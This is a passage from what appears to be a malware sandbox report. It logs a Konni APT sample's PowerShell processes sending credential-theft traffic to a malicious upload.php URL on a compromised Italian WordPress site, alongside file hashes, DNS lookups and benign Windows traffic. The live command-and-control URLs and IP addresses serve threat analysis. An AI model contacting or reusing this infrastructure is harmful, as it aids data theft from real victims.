SHA256:EB43B1D364DD08B6A16406FFD458C18F267541864AEA8FC30B0BD1FA3AEF40AE
1944 | expand.exe | C:\Users\Public\Documents\68354122.bat | text
MD5:2BF12F8FB8C2B2D8B0F0832BBF132A8C
SHA256:C3FC560BDAE5F2C0CDADC2C32E71D34EC31FDD7F033B1CC128370D34255EBA93
HTTP(S) requests: 9
TCP/UDP connections: 29
DNS requests: 15
Threats: 5

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
7024 | SIHClient.exe | GET | 200 | 23.209.214.100:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | ID | binary | 408 b | whitelisted
- | - | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | binary | 471 b | whitelisted
7024 | SIHClient.exe | GET | 200 | 23.209.214.100:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | ID | binary | 419 b | whitelisted
648 | powershell.exe | POST | 200 | 31.11.36.13:80 | http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php | IT | - | - | malicious
2136 | backgroundTaskHost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | US | binary | 471 b | whitelisted
6940 | powershell.exe | POST | 200 | 31.11.36.13:80 | http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php | IT | - | - | malicious
6320 | powershell.exe | GET | 200 | 31.11.36.13:80 | http://www.fantasiasognorealta.com/wp-includes/js/src/list.php?638730382673256135=0WP0hsq2iepw1JlRZR3GALnj4WvS | IT | - | - | malicious
6688 | powershell.exe | POST | 200 | 31.11.36.13:80 | http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php | IT | - | - | malicious
6356 | powershell.exe | POST | 200 | 31.11.36.13:80 | http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php | IT | - | - | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
1176 | svchost.exe | 40.126.32.68:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1076 | svchost.exe | 184.28.89.167:443 | go.microsoft.com | AKAMAI-AS | US | whitelisted
5064 | SearchApp.exe | 2.21.65.154:443 | www.bing.com | Akamai International B.V. | NL | whitelisted
3568 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5464 | powershell.exe | 162.241.219.212:443 | raleighice.com | OIS1 | US | unknown
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
7024 | SIHClient.exe | 20.12.23.50:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.32.68
  • 40.126.32.136
  • 40.126.32.76
  • 20.190.160.22
  • 40.126.32.140
  • 40.126.32.134
  • 20.190.160.20
  • 20.190.160.14
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
www.bing.com
  • 2.21.65.154
  • 2.21.65.132
whitelisted
raleighice.com
  • 162.241.219.212
unknown
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 23.209.214.100
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
www.fantasiasognorealta.com
  • 31.11.36.13
malicious
arc.msn.com
  • 20.74.47.205
whitelisted

Threats

PID | Process | Class | Message
648 | powershell.exe | Successful Credential Theft Detected | SPYWARE [ANY.RUN] Konni.APT Exfiltration
6688 | powershell.exe | Successful Credential Theft Detected | SPYWARE [ANY.RUN] Konni.APT Exfiltration
6940 | powershell.exe | Successful Credential Theft Detected | SPYWARE [ANY.RUN] Konni.APT Exfiltration
6356 | powershell.exe | Successful Credential Theft Detected | SPYWARE [ANY.RUN] Konni.APT Exfiltration
6320 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
No debug info